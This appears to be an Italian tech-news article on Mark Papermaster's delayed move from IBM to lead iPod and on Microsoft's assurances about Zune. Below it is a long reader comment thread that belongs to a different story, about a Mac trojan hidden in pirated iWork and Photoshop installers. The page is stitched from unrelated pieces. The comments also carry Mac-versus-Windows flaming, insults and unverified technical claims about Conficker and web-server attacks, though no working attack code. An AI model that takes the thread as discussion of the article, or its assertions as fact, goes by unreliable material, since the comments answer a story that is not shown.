Il futuro di iPod e Zune

Microsoft fa sapere che con il suo player non intende mollare, e che tutto va come previsto. Apple annuncia che ora il suo lettore ora ha un nuovo papà

Dopo l’abbandono di Tony Fadell, che ha deciso di dedicare più tempo alla sua famiglia, e dopo le polemiche con IBM per la scelta del suo successore tra le fila del gigante di Armonk, ora sembra tornato il sereno in casa iPod : il nuovo responsabile del suo sviluppo, nonché vicepresidente di Apple che renderà conto del suo operato direttamente a Steve Jobs, è Mark Papermaster. L’hanno confermato le due aziende con due comunicati stampa dai toni leggermente differenti.

Nel caso di Apple si sceglie di porre l’accento sull’esperienza di Papermaster e sul contributo che saprà dare alla crescita del player MP3 più venduto del mercato: 25 anni di lavoro alle spalle, laurea all’Università del Texas in ingegneria, master in ingegneria all’Università del Vermont, collaborazioni tuttora esistenti con il suo primo ateneo in qualità di consulente. Che il neo-dirigente Apple entrerà in carica solo il 24 di aprile , mesi dopo che tutta questa faccenda è iniziata, è un particolare quasi trascurabile.

Il comunicato IBM, invece, si dilunga nel chiarire che l’intera vicenda è stata caratterizzata dall’intervento – dietro richiesta di Big Blue – di un tribunale federale che ha temporaneamente congelato la posizione del suo ex-vicepresidente in attesa di chiarimenti. Chiarimenti che sono arrivati oggi, e che imporranno a Papermaster un periodo di purgatorio di sei mesi prima di poter prendere servizio in Apple, e che gli imporranno l’assoluta discrezione sulle informazioni confidenziali riguardanti le tecnologie IBM eventualmente in suo possesso.

Alla prima istanza seguirà un’ordinanza del giudice che valuterà nel tempo il comportamento del manager: almeno fino al 24 ottobre , vale a dire un anno esatto dopo la sua uscita da IBM. Nel frattempo Papermaster dovrà rendere conto per due volte, a luglio e quindi ad ottobre, della sua osservanza delle regole onde evitare che la corte possa decidere di prendere provvedimenti nei suoi confronti.

Per IBM si tratta senz’altro di un risultato significativo : aver spostato in avanti di almeno sei mesi le lancette dell’orologio per l’entrata effettiva di Papermaster in Apple dovrebbe garantire una certa tranquillità per quanto attiene i suoi segreti industriali, sicurezza rafforzata dall’obbligo imposto all’ingegnere di riferire sulle sue attività per un’altra metà anno. Da parte sua, la Mela avrà comunque il paracadute di Fadell in azienda per ancora qualche tempo: ci sarà spazio per far sì che il nuovo arrivato familiarizzi con i colleghi e l’hardware e si ritagli il suo spazio nel futuro del player MP3.

Una soluzione che dovrebbe quindi mettere al sicuro il destino di iPod, mentre lo stesso non poteva dirsi – fino a qualche ora fa – per Zune : il lettore multimediale di casa Microsoft non ha mai goduto di particolare successo di cifre o presso il pubblico, anche considerato che viene venduto solo nel mercato nordamericano, ma i risultati deludenti dell’ultimo trimestre avevano ormai fatto pensare ai più che il suo destino fosse segnato. Niente di più sbagliato: ancora una volta BigM è intervenuta per chiarire che Zune è vivo e lotta insieme a noi . Almeno per tutto il 2009.

Robbie Bach , presidente della divisione di Microsoft per l’entertainment e i device, dalle pagine del Seattle Post-Intelligencer chiarisce che non solo le vendite del periodo natalizio sono andate “bene”, ma che anzi nel quadro complessivo della crisi economica Zune “si è comportato proprio secondo le nostre aspettative” e che quindi Microsoft “è sicura della direzione in cui sta andando”.

Ci pensa Adam Sohn , responsabile del marketing di Zune, a gettare poi altra acqua sul fuoco: “Ogni volta che succede qualcosa ci sono una serie di persone che attaccano la solfa Il cielo sta crollando, Zune è morto ha spiegato – Il fatto è che siamo sul punto di sfornare la prossima generazione di Zune, con delle innovazioni sia software che hardware”. Lo sviluppo procederebbe a ritmo serrato, e le novità dovrebbero arrivare “entro quest’anno”.

Luca Annunziata

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Fuffa scrive:
    hackintosh...
    Il fatto è che probabilmente c'è qualcuno che si è accorto che stanno comparendo parecchi utenti che usano versioni "hackintosh" (OSX modificato per poter essere installato su un normale PC). Figuriamoci poi se questi utenti utilizzano software originale, senza contare la poca competenza che hanno del mondo MAC.Detto questo, è normale dedurre che i "malintenzionati" hanno nuova carne da mettere sul fuoco...e se lo fanno, vuol anche dire che lo trovano profittevole piuttosto che una perdita di tempo.
    • Sgabbio scrive:
      Re: hackintosh...
      Fare un Hackintosh, non è propio alla portata di tutti, per non parlare che ti troveresti a combattere con problemi di vario genere.
      • Fuffa scrive:
        Re: hackintosh...
        - Scritto da: Sgabbio
        Fare un Hackintosh, non è propio alla portata di
        tutti, per non parlare che ti troveresti a
        combattere con problemi di vario
        genere.Io ce l'ho in dual boot con XP e una volta che hai capito cosa impostare, si è abbastanza semplice...
        • freax scrive:
          Re: hackintosh...
          credi davvero che ci sia qualcuno che installa hackintosh e poi scarica i file da internet senza sapere che possono esserci virus e cose varie??e poi scusa ma mac non era da XXXXXXXXX? :D
          • Sgabbio scrive:
            Re: hackintosh...
            Più che altro, Si usa una copia "modificata" di OSX per fare Hackintosh. Quindi si possono trovare dei problemi anche per fare gli aggiornamenti automatici.
    • AhiAhi scrive:
      Re: hackintosh...
      - Scritto da: Fuffa
      Il fatto è che probabilmente c'è qualcuno che si
      è accorto che stanno comparendo parecchi utenti
      che usano versioni "hackintosh" (OSX modificato
      per poter essere installato su un normale PC).
      Figuriamoci poi se questi utenti utilizzano
      software originale, senza contare la poca
      competenza che hanno del mondo
      MAC.
      che è una gran XXXXXXX dato che installare OsX x86 su hw generico non è una passeggiata per tutti
      Detto questo, è normale dedurre che i
      "malintenzionati" hanno nuova carne da mettere
      sul fuoco...e se lo fanno, vuol anche dire che lo
      trovano profittevole piuttosto che una perdita di
      tempo.che detta così genericamente vuol dire tutto e nulla come al solito
      • Fuffa scrive:
        Re: hackintosh...
        - Scritto da: AhiAhi
        che è una gran XXXXXXX dato che installare OsX
        x86 su hw generico non è una passeggiata per
        tuttiallora sarò troppo avanti io, perchè a me sembra abbastanza facile.
        • AhiAhi scrive:
          Re: hackintosh...
          evidentemente ci sono forum ad hoc per la risoluzione di problemi di installazione che sono stati messi in piedi solo per gettare fumo negli occhi e tu hai sicuramente ragione.
    • -ToM- scrive:
      Re: hackintosh...
      - Scritto da: Fuffa
      Figuriamoci poi se questi utenti utilizzano
      software originale, senza contare la poca
      competenza che hanno del mondo
      MAC.La variabilità del mondo mac...A volte è il sistema più semplice, a volte richiede competenza.Decidetevi.
  • Luigi scrive:
    Bisogna essere incauti
    Un pkg differente da quello originale lo si riconosce subito e solo i neofiti del Mac potrebbeo scompattarlo. Inoltre, per installare qualcosa ci viene sempre richiesta la password di amministratore; solo un incauto la inserirebbe, se non sicuro di ciò che fa. Ricordo un pkg che si spacciava per plugin di QuickTime ed una volta installato sostituiva alcuni DNS, reindirizzando verso server spia; ma, come ho detto, bisogna fare diversi passaggi ed immettere la propria password. Per il momento, a mio parere, il sistema operativo OSX resta il più sicuro (anche per via della sua architettura interna); tutto quello che si dice in giro sono solo leggende sparse da case produttrici rivali o da chi il Mac non l'ha capito "bene bene".Luigi
    • lellykelly scrive:
      Re: Bisogna essere incauti
      modificare lo script dell'istaller includendo il pkg infetto troppo difficile?
    • Joe Tornado scrive:
      Re: Bisogna essere incauti

      neofiti del Mac"utonti", prego
      un incauto "utonto", grazietanto per usare la terminologia con la quale viene indicato l'utilizzatore comune di Windows da certe altre categorie di personaggi.
  • -ToM- scrive:
    Forum VS PI
    - Il trojan è innocuo, è impossibile che funzioni.- Su windows qualsiasi malware fa danno perchè non dipende dalle inefficienze degli utenti (MAI).- OSX è inespugnabile.questo è quello che si legge da sempre insieme a:- Il grande Jimi comunicava con gli alieni attraverso la chitarra- Nell´area 51 ci sono alieni veri vivisezionati per esperimenti scientifici- Mio cuggino si è tolto il casco e si è aperta la testaPS.: tanto a scrivere qualcosa di serio non ci si guadagna nulla, mentre io sono realmente preoccupato perchè fra qualche anno non esisterà più nessun sistema che ti fa stare tranquillo (forse linux, forse)
    • attonito scrive:
      Re: Forum VS PI

      PS.: tanto a scrivere qualcosa di serio non ci si
      guadagna nulla, mentre io sono realmente
      preoccupato perchè fra qualche anno non esisterà
      più nessun sistema che ti fa stare tranquillo
      (forse linux, forse)A parte tutto, il concetto base e' che i ptrogrammi, ance se banali, sono soggetti ad errori di programmazione programmazione sfruttabili da malintenzionati. Anche openBSD e' prono a tali bachi.
    • MeX scrive:
      Re: Forum VS PI
      - Scritto da: -ToM-
      - Il trojan è innocuo, è impossibile che funzioni.
      - Su windows qualsiasi malware fa danno perchè
      non dipende dalle inefficienze degli utenti
      (MAI).
      - OSX è inespugnabile.

      questo è quello che si legge da sempre insieme a:

      - Il grande Jimi comunicava con gli alieni
      attraverso la
      chitarra

      - Nell´area 51 ci sono alieni veri vivisezionati
      per esperimenti
      scientifici

      - Mio cuggino si è tolto il casco e si è aperta
      la
      testa

      PS.: tanto a scrivere qualcosa di serio non ci si
      guadagna nulla, mentre io sono realmente
      preoccupato perchè fra qualche anno non esisterà
      più nessun sistema che ti fa stare tranquillo
      (forse linux,
      forse)hai dimenticato Vista é un sucXXXXXWindows 7 rivoluzionerá l'infomratica cosí come la conosciamoLo Zune é l'iPodKiller :D
      • -ToM- scrive:
        Re: Forum VS PI
        - Scritto da: MeX
        hai dimenticato Vista é un sucXXXXX
        Windows 7 rivoluzionerá l'infomratica cosí come
        la conosciamo
        Lo Zune é l'iPodKiller :Dcè una differenza, quello che dici tu sono fud anti windows."OSX inespugnabile" sono parole di Jobs.
        • MeX scrive:
          Re: Forum VS PI
          ehm... vuoi che inizio a scriverti la lista delle affermazioni di Balmer e Gates? :D
          • -ToM- scrive:
            Re: Forum VS PI
            - Scritto da: MeX
            ehm... vuoi che inizio a scriverti la lista delle
            affermazioni di Balmer e Gates?
            :Dbeh, se vuoi trasformare il thread in una ripicca accomodati...un breve "hai ragione" bastava...
          • pippo scrive:
            Re: Forum VS PI


            ehm... vuoi che inizio a scriverti la lista
            delle

            affermazioni di Balmer e Gates?

            :D

            beh, se vuoi trasformare il thread in una ripicca
            accomodati...
            un breve "hai ragione" bastava...Non ci riuscirai mai, la scimmietta di giobs vuol sempre l'ultima parola ;)
          • MeX scrive:
            Re: Forum VS PI
            hai ragione, anche la Apple fa marketing come qualsiasi multinazionale, e sarebbe una novità?
    • MeX scrive:
      Re: Forum VS PI
      e dimenticavo..."questo é l'anno di linux!" :D
      • -ToM- scrive:
        Re: Forum VS PI
        - Scritto da: MeX
        e dimenticavo...
        "questo é l'anno di linux!" :Dah questa è la trollata migliore perchè chi "vive di linux" (quelli veri) non ambisce ne alla fama che intendono quelli che dicono "questo è l'anno di linux" (da tifosi), ne a raggiungere quote di mercato superiori ad altri OS, perchè dopotutto Apple ha avuto il benestare di Adobe quando copriva il 2% del mercato e non si smuoveva dagli USA se non in campi specifici.PS.: Quando certi concetti verranno assimilati questo forum non sarà più come siamo abituati a vederlo adesso. Ci mancherà ma sappiamo che è pura utopia.
    • lellykelly scrive:
      Re: Forum VS PI
      quello che ti fa stare tranquillo è la speranza che i tuoi compari non facciano i cattivi.ma è solo questione di tempo, qualche impavido traditore salterà fuori.
  • a n o n i m o scrive:
    [OT] Reda usate il lucchetto
    invece che censurare i post scomodi, tra l'altro c'erano pure link per approfondire l'argomentobah ma perchè me la prendo, meglio il fdt che almeno lì non c'è ipocrisia :-o
  • FDG scrive:
    iServices Trojan Removal Tool 1.1
    Nel caso in cui qualcuno avesse abboccato all'amo, per evitare di spendere soldi si può usare il tool di securemac.http://www.securemac.com/
    • -ToM- scrive:
      Re: iServices Trojan Removal Tool 1.1
      Beccarselo con iWork è da scemotti, ma per quanto riguarda il crack di PS, è facile che si diffonda perchè gli studi sono pieni zeppi di roba Adobe copiata, anche quelli che fatturano decine di migliaia di euro all´anno ;)In parole povere, è colpa sempre dell´utente, sia su OSX che su windows.
      • Teo_ scrive:
        Re: iServices Trojan Removal Tool 1.1
        - Scritto da: -ToM-
        Beccarselo con iWork è da scemotti, ma per quanto
        riguarda il crack di PS, è facile che si diffonda
        perchè gli studi sono pieni zeppi di roba Adobe
        copiata, anche quelli che fatturano decine di
        migliaia di euro all´anno
        ;)Quelli che fatturano meno di decine di migliaia di euro lanno, è meglio che chiudano.
        • -ToM- scrive:
          Re: iServices Trojan Removal Tool 1.1
          - Scritto da: Teo_
          Quelli che fatturano meno di decine di migliaia
          di euro lanno, è meglio che
          chiudano.se fatturo 250 mila euro all´anno e vivo in un posto il cui costo della vita è un terzo rispetto alle grandi città devo chiudere?PS.: Una cifra simile non mi permette di dire che fatturo centinaia di miglia di euro all´anno a buon senso.
          • Teo_ scrive:
            Re: iServices Trojan Removal Tool 1.1
            - Scritto da: -ToM-
            - Scritto da: Teo_

            Quelli che fatturano meno di decine di migliaia

            di euro lanno, è meglio che

            chiudano.

            se fatturo 250 mila euro all´anno e vivo in un
            posto il cui costo della vita è un terzo rispetto
            alle grandi città devo
            chiudere?Se uno studio fattura meno di decine di migliaia di euro (20.000) un pensiero lo farei.
  • nome e cognome scrive:
    cvd: e' solo questione di diffusione
    Ora che i pc della ueppolz non sono piu' utilizzati solo da designer e architetti, ma anche da gente che sa che i computer possono fare qualcosa di piu' che suonare mp3, cominciano a vedersi i XXXXXn.E' solo questione di tempo prima che arrivino i worm, certo la diffusione e' ancora abbastanza ridicola e trovare mac collegati in rete permanentemente (ovvero nelle aziende) e' praticamente impossibile quindi cari macachi dormite sonni tranquilli, i vostri 2000 euro di hardware scadente sono al sicuro ancora per un pochino.
    • MonsterS4r scrive:
      Re: cvd: e' solo questione di diffusione
      - Scritto da: nome e cognome
      Ora che i pc della ueppolz non sono piu'
      utilizzati solo da designer e architetti, ma
      anche da gente che sa che i computer possono fare
      qualcosa di piu' che suonare mp3, cominciano a
      vedersi i
      XXXXXn.
      E' solo questione di tempo prima che arrivino i
      worm, certo la diffusione e' ancora abbastanza
      ridicola e trovare mac collegati in rete
      permanentemente (ovvero nelle aziende) e'
      praticamente impossibile quindi cari macachi
      dormite sonni tranquilli, i vostri 2000 euro di
      hardware scadente sono al sicuro ancora per un
      pochino.Ti diró , ho un MacBook da due anni ed é collegato ad internet 24/24 ore , rimane acceso settimane senza alcun problema anche andando in standby (...ricordo lo standby di Windows :( ) riparte in 1 secondo.Se vuoi ti passo l'IP cosí me lo infetti , hahahahah
      • nome e cognome scrive:
        Re: cvd: e' solo questione di diffusione

        Ti diró , ho un MacBook da due anni ed é
        collegato ad internet 24/24 ore , rimane acceso
        settimane senza alcun problema anche andando in
        standby (...ricordo lo standby di Windows :( )E lo ricordi male visto che il safe sleep di macoshit e il fast sleep di vista sono identici. Fino a quando non hanno implementato il safe sleep (2 anni fa mica decenni), fine batteria (sul laptop)? Via la corrente (sui desktop)? Ops...
        Se vuoi ti passo l'IP cosí me lo infetti ,
        hahahahahMi servirebbe anche un mac e quindi una sana dose di masochismo ...
        • MonsterS4r scrive:
          Re: cvd: e' solo questione di diffusione
          - Scritto da: nome e cognome
          E lo ricordi male visto che il safe sleep di
          macoshit e il fast sleep di vista sono identici.
          Fino a quando non hanno implementato il safe
          sleep (2 anni fa mica decenni), fine batteria
          (sul laptop)? Via la corrente (sui desktop)?
          Ops...No no lo ricordo bene, lo standby, fino ad XP (Vista non lo uso), dovevo pregarlo di far riparteire bene la macchina , altrimenti (spesso) dovevi premere il tasto di accensione fino allo spegnimento completo (cosa che alle macchine Windows fa molto male).
          Mi servirebbe anche un mac e quindi una sana dose
          di masochismo
          ...ma come ?? inizi a mettere i paletti !!Chiamalo masochismo , io lo chiamo uso NORMALE di uno strumento informatico senza doversi preoccupare dei lupi che girano sul web.
          • nome e cognome scrive:
            Re: cvd: e' solo questione di diffusione

            No no lo ricordo bene, lo standby, fino ad XP
            (Vista non lo uso), dovevo pregarlo di far
            riparteire bene la macchina , altrimenti (spesso)Se compri hardware scadente succede.
            ma come ?? inizi a mettere i paletti !!E chiamalo paletto, il macbook piu' schifoso costa 1000 euro, se proprio devo buttare i soldi lo faccio in donne, alcool e gioco d'azzardo...
            Chiamalo masochismo , io lo chiamo uso NORMALE di
            uno strumento informatico senza doversi
            preoccupare dei lupi che girano sul
            web.Io lo chiamo buttare i soldi.
          • Simone82 scrive:
            Re: cvd: e' solo questione di diffusione
            Se non ti piacciono i mac sono affari tuoima continuare a fomentare queste liti. Non è vero che sono brutte macchine. Non è vero che sono perfetti.dipende dalle esigenz e sfizi di ognuno.nessuno può permettersi il lusso di dire cosa in assoluto è bello o brutto e come vengono spesi i soldi.Io ho un macbook ed un lenovo thinkpad t61.Entrambe ottime macchine. Ti dirò che a parità di hw il mac in avvio vince 200 a zero e sul lenovo c'è xp neanche vista.
          • MonsterS4r scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: nome e cognome
            Se compri hardware scadente succede. Tipo HP , Dell, ecc ?? Ripeto puoi difendere tutto di Windows ma non lo stand-by (pre Vista) , altro discorso l'ibernazione , lí mai un problema.
            E chiamalo paletto, il macbook piu' schifoso
            costa 1000 euro, se proprio devo buttare i soldi
            lo faccio in donne, alcool e gioco
            d'azzardo...E sí son proprioo brutti i MAC, ma non li chiamate "fashion" , per fighetti , belli solo per l'arredamento ?Per la precisione sono 949 euri
            Io lo chiamo buttare i soldi.E poi mi parli di gioco d'azzardo .....
          • nome e cognome scrive:
            Re: cvd: e' solo questione di diffusione

            Tipo HP , Dell, ecc ??
            Ripeto puoi difendere tutto di Windows ma non lo
            stand-by (pre Vista) , altro discorso
            l'ibernazione , lí mai un
            problema.Io mai un problema con lo standby, anzi sui pc delle varie aziende che ho visto c'e' sempre vista o 2k e vanno tutti alla perfezione.

            E chiamalo paletto, il macbook piu' schifoso

            costa 1000 euro, se proprio devo buttare i soldi

            lo faccio in donne, alcool e gioco

            d'azzardo...

            E sí son proprioo brutti i MAC, ma non li
            chiamate "fashion" , per fighetti , belli solo
            per l'arredamentoInfatti, schifoso in termini di quello che c'e' dentro. Fuori sono bellissimi solo che ogni tanto il pc va anche acceso.
            Per la precisione sono 949 euri

            Io lo chiamo buttare i soldi.
            E poi mi parli di gioco d'azzardo .....Se gioco alla roulette 949 euro e vinco sono 33mila euro... 1 possibilita' su 35 non e' neanche male rispetto alla probabilita' che mi possa servire a qualcosa un mac.
          • MonsterS4r scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: nome e cognome
            Io mai un problema con lo standby, anzi sui pc
            delle varie aziende che ho visto c'e' sempre
            vista o 2k e vanno tutti alla
            perfezione.Lasciami il beneficio del dubbio.
            Infatti, schifoso in termini di quello che c'e'
            dentro. Fuori sono bellissimi solo che ogni tanto
            il pc va anche acceso.Dentro c'é tutto quello che un normale utente ha bisogno, prova ad aprire la scatola di un pc accendilo ed apri un pdf. Secondo me devi scaricare Acrobat installarlo e solo allora puoi vedere il file. E questo é solo il primo esempio che mi viene in mente, senza dimenticarsi che tu prima di scaricare il software faresti meglio ad installare un AV e, consigliato, un firewall.PS prima di accendere il pc ricordati di accendere il cervello se no vai in internet senza antivirus e ti ammali.
            Se gioco alla roulette 949 euro e vinco sono
            33mila euro... 1 possibilita' su 35 non e'
            neanche male rispetto alla probabilita' che mi
            possa servire a qualcosa un
            mac.Ricorda che a lungo andare vince SEMPRE il banco e PERDI tu.Poi se una volta giochi e ti va di fortuna devi essere forte a smettere altrimanti PERDI.
          • nome e cognome scrive:
            Re: cvd: e' solo questione di diffusione

            Dentro c'é tutto quello che un normale utente ha
            bisogno, prova ad aprire la scatola di un pc
            accendilo ed apri un pdf. Secondo me devi
            scaricare Acrobat installarlo e solo allora puoi
            vedere il file. E questo é solo il primo esempio
            che mi viene in mente, senza dimenticarsi che tuQuesto e' perfettamenete normale, se microsoft integrasse un lettore PDF in windows, come fa apple, verrebbe trascinata immediatamente in tribunale.
            prima di scaricare il software faresti meglio ad
            installare un AV e, consigliato, un
            firewall.A parte che io non uso antivirus e nemmeno un firewall visto che ho un router ma vista la notizia che stai commentando dovresti farlo anche tu.
            PS prima di accendere il pc ricordati di
            accendere il cervello se no vai in internet senza
            antivirus e ti
            ammali.Guarda l'antivirus ce l'ho sul pc aziendale perche' l'azienda mi paga la licenza (a casa ovviamente no)... non ho mai ricevuto una segnalazione di virus. Ma proprio niente... eppure di siti XXXXX ne guardo.
            Ricorda che a lungo andare vince SEMPRE il banco
            e PERDI
            tu.
            Poi se una volta giochi e ti va di fortuna devi
            essere forte a smettere altrimanti
            PERDI.Certo, ma sono forte ... nonostante abbia vissuto per mesi vicino a Cupertino ho resistito.
          • ruppolo scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: nome e cognome
            Questo e' perfettamenete normale, se microsoft
            integrasse un lettore PDF in windows, come fa
            apple, verrebbe trascinata immediatamente in
            tribunale.Ma che bella arrampicata sugli specchi.Ci sono addirittura 3 versioni del formato PDF che sono standardizzati a livello ISO, uno per l'archiviazione dei documenti PDF/A, uno per le arti grafiche PDF/X e uno recentissimo (dell'anno scorso) per tutti gli usi.Il Mac non solo è in grado di aprirli ma anche di CREARLI out-of-the-box, da qualsiasi applicazione. E questo da prima che Microsoft vi propinasse Windows XP.La verità è che avete sempre avuto un sistema operativo di XXXXX e sempre lo avrete.
          • pippo scrive:
            Re: cvd: e' solo questione di diffusione

            Ci sono addirittura 3 versioni del formato PDF
            che sono standardizzati a livello ISO, uno per
            l'archiviazione dei documenti PDF/A, uno per le
            arti grafiche PDF/X e uno recentissimo (dell'anno
            scorso) per tutti gli
            usi.
            Il Mac non solo è in grado di aprirli ma anche di
            CREARLI out-of-the-box, da qualsiasi
            applicazione. E questo da prima che Microsoft vi
            propinasse Windows
            XP.E quindi?Genera anche formati di autocad e povray?Se non lo fa, io sulla mia scatola xp trovo una MAREA di programmi per fare qualsiasi cosa( anche AV :$ ), voi? :D
          • Gianluca70 scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: ruppolo

            La verità è che avete sempre avuto un sistema
            operativo di XXXXX e sempre lo
            avrete.Signori, Mr. Oxford ha sentenziato!Senti saputello, ma con quale competenza ti arroghi il diritto di parlare di ciò che non usi?Tralasciando che la gestione dei PDF non è roba di kernel o OS, come piace dire sempre a quelli dell'OSS, che onestà intellettuale dimostri se manco usi quello che screditi?Fai pessima pubblicità alla tua causa, sei solo un tifoso da curva.
          • nome e cognome scrive:
            Re: cvd: e' solo questione di diffusione

            Il Mac non solo è in grado di aprirli ma anche di
            CREARLI out-of-the-box, da qualsiasiSemplicemente perche' adobe ancora non ha deciso di rompergli le palle.
            applicazione. E questo da prima che Microsoft vi
            propinasse Windows
            XP.Stralol, quando noi avevamo XP voi stavate ancora capendo cosa significa multitasking.
            La verità è che avete sempre avuto un sistema
            operativo di XXXXX e sempre lo
            avrete.Lol, quando io usavo 2k, sistema operativo solido e multitasking pre-emptive tu stavi ancora su macos 9 senza memoria protetta e multitasking: l'unico sistema operativo dove il cestino dei rifiuti stava attorno il so e non dentro. Poco dopo ti hanno rifilato macosshit 10.0 ovvero una alpha release, sempre se eri abbastanza fortunato da non avere un imac g3 slot altrimenti l'aggiornamento del firmare ti fumava l'intera scheda madre. Poi mentre noi migravamo a xp tu ti baloccavi con macoshit 10.1 ovvero la beta della 10.0. E ora ti diverti con Leopard, che ti regala quicktime e il suo fantastico framework: il software piu' bacato della storia recente (appro' oggi ne hanno trovata una nuova highly critical).La differenza tra te e me e' che per fare girare allo stesso modo il mio sistema operativo di XXXXX spendo la meta' di te.
          • logicaMente scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: nome e cognome
            Io mai un problema con lo standby, anzi sui pc
            delle varie aziende che ho visto c'e' sempre
            vista o 2k e vanno tutti alla
            perfezione.LOL! (era una battuta, vero?)
        • krane scrive:
          Re: cvd: e' solo questione di diffusione
          - Scritto da: nome e cognome

          Se vuoi ti passo l'IP cosí me lo infetti ,

          hahahahah

          Mi servirebbe anche un mac e quindi una sana dose
          di masochismo
          ...E perche' mai ti servirebbe un mac per in fettare un mac con un virus del genere ?
          • nome e cognome scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: krane
            - Scritto da: nome e cognome



            Se vuoi ti passo l'IP cosí me lo infetti ,


            hahahahah



            Mi servirebbe anche un mac e quindi una sana
            dose

            di masochismo

            ...

            E perche' mai ti servirebbe un mac per in fettare
            un mac con un virus del genere
            ?Mh... dubito che un eseguibile compilato su un pc windows o linux funzioni... potrei anche pensare di scrivere il codice bit x bit ma non essendo un cantinaro preferisco vivere.
          • krane scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: nome e cognome
            - Scritto da: krane

            - Scritto da: nome e cognome





            Se vuoi ti passo l'IP cosí me lo infetti ,



            hahahahah





            Mi servirebbe anche un mac e quindi una sana

            dose


            di masochismo


            ...



            E perche' mai ti servirebbe un mac per in

            fettare un mac con un virus del genere

            ?
            Mh... dubito che un eseguibile compilato su un pc
            windows o linux funzioni... potrei anche pensare
            di scrivere il codice bit x bit ma non essendo un
            cantinaro preferisco vivere.E perche' dovresti eseguirlo sul tuo per infettare un altro ? Solidarieta' forse ?Inoltre e' evidente che non sai cos'e' la cross compilazione.(rotfl)(rotfl)(rotfl)
    • pabloski scrive:
      Re: cvd: e' solo questione di diffusione
      i worm però hanno bisogno di falle per propagarsi, i trojan solo di utonti cerebrolesiè lo stesso discorso che si fa con linux....nei settori in cui linux è in maggioranza, cioè i web server, i sistemi embedded, ecc.... stranamente è ancora windows ad essere il più bersagliato....se io fossi un pirata informatico intenzionato a distribuire malware tramite siti web, andrei a crakkare i web server linux non quelli windows, così da massimizzare l'effetto....invece questo non avviene, come mai?
      • nome e cognome scrive:
        Re: cvd: e' solo questione di diffusione

        è lo stesso discorso che si fa con linux....nei
        settori in cui linux è in maggioranza, cioè i web
        server, i sistemi embedded, ecc.... stranamente è
        ancora windows ad essere il più
        bersagliato....Ti sei perso per strada le clamorose intrusioni nei sistemi di redhat e apache? Ancora non si sa esattamente come li hanno traforati... alla faccia dell'open.
        se io fossi un pirata informatico intenzionato a
        distribuire malware tramite siti web, andrei a
        crakkare i web server linux non quelli windows,
        così da massimizzare l'effetto....invece questo
        non avviene, come
        mai?Mah hai le idee ben confuse toh...http://www.cmswire.com/cms/web-cms/how-they-hack-your-website-overview-of-common-techniques-002339.php
        • pabloski scrive:
          Re: cvd: e' solo questione di diffusione
          - Scritto da: nome e cognome
          Ti sei perso per strada le clamorose intrusioni
          nei sistemi di redhat e apache? Ancora non si sa
          esattamente come li hanno traforati... alla
          faccia
          dell'open.
          no si sa, rubarono le password ftp dai PC windows di alcuni contributor
          Mah hai le idee ben confuse toh...

          http://www.cmswire.com/cms/web-cms/how-they-hack-yhai sbagliato riferimento, io non parlo di attacchi contro le web applications, ma di attacchi contro il sistema operativo che si sono verificati anche nell'ultimo caso della famigerata vulnerabilità che ha portato alla diffusione di Confickerlì non sono state attaccate le web applications, ma sql server tramite un worm che è stato poi usato per prendere il controllo dei server e modificare i siti web ospitati su tali server al fine di introdurre degli iframe che puntavano alle pagine contenenti gli exploit per ie e non è la prima volta che agiscono così....nei confronti di linux non hanno mai agito in questo modo e questo perchè non esistono vulnerabilità sfruttabili da remoto da almeno 18 mesi .... vai su frsirt e fatti un bel giro e forse capirai qualcosa di come funzionano gli attacchi ai sistemi informatici
          • Gianluca70 scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: pabloski
            hai sbagliato riferimento, io non parlo di
            attacchi contro le web applications, ma di
            attacchi contro il sistema operativo che si sono
            verificati anche nell'ultimo caso della
            famigerata vulnerabilità che ha portato alla
            diffusione di
            Conficker

            lì non sono state attaccate le web applications,
            ma sql server tramite un worm che è stato poi
            usato per prendere il controllo dei server e
            modificare i siti web ospitati su tali server al
            fine di introdurre degli iframe che puntavano
            alle pagine contenenti gli exploit per ie
            Anche tu sei molto confuso o molto disinformato:1. Conficker sfrutta una falla dell'RPC, non c'entra nulla con SQL (ti confondi con SQ-Hell che sfruttava la 1433? è roba vecchia di anni, e la patch era disponibile da mesi quando l'infezione dilagò...)2. la patch RPC è disponibile dal 27 di ottobre 2008, mica da 1 giorno3. di conseguenzagli idioti che permettono connessioni RPC o 1433 direttamente da internet e in più non pecciano i propri server sono destinati ad auto-estinguersi, è la teoria dell'evoluzione della specie...4. le infezioni Conficker più gravi sono state causate dall'interno delle aziende stesse, e non da internet, proprio perchè i brillanti amministratori, oltre a non pecciare i server, non sono nemmeno in grado di gestire i grant degli utenti e blindare i propri client...E visto che i MAC sono la 10% di share ed il trend è in crescitahttp://marketshare.hitslink.com/os-market-share.aspx?qprid=9ecco spiegato l'interesse dei virus-writer, più ce n'è di MAC e più macachi utonti e scaricatori di programmi piratati ci saranno... that's all.
          • pabloski scrive:
            Re: cvd: e' solo questione di diffusione
            - Scritto da: Gianluca70
            Anche tu sei molto confuso o molto disinformato:
            1. Conficker sfrutta una falla dell'RPC, non
            c'entra nulla con SQL (ti confondi con SQ-Hell
            che sfruttava la 1433? è roba vecchia di anni, e
            la patch era disponibile da mesi quando
            l'infezione
            dilagò...)eppure io non capisco, mi pare di parlare italiano non turconon sto parlando della falla al servizio server usata dal worm conficker per diffondersi, bensì sto parlando della falla usata dai cracker per iniettare gli iframe infettivi nei siti webè stato fatto anche con conficker come ulteriore metodo di spreading, ma è stato fatto in passato per molti altri trojan
            2. la patch RPC è disponibile dal 27 di ottobre
            2008, mica da 1
            giornoe fu lasciata aperta per 2 settimane, mentre cazzeggiava dicendo che non c'erano pericoli
            3. di conseguenzagli idioti che permettono
            connessioni RPC o 1433 direttamente da internet e
            in più non pecciano i propri server sono
            destinati ad auto-estinguersi, è la teoria
            dell'evoluzione della
            specie...e come la mettiamo con gli iframe infetti? e l'autorun che non si disabilita e causa lo spreading di conficker tramite chiavette usb?
            4. le infezioni Conficker più gravi sono state
            causate dall'interno delle aziende stesse, e non
            da internet, proprio perchè i brillanti
            amministratori, oltre a non pecciare i server,
            non sono nemmeno in grado di gestire i grant
            degli utenti e blindare i propri
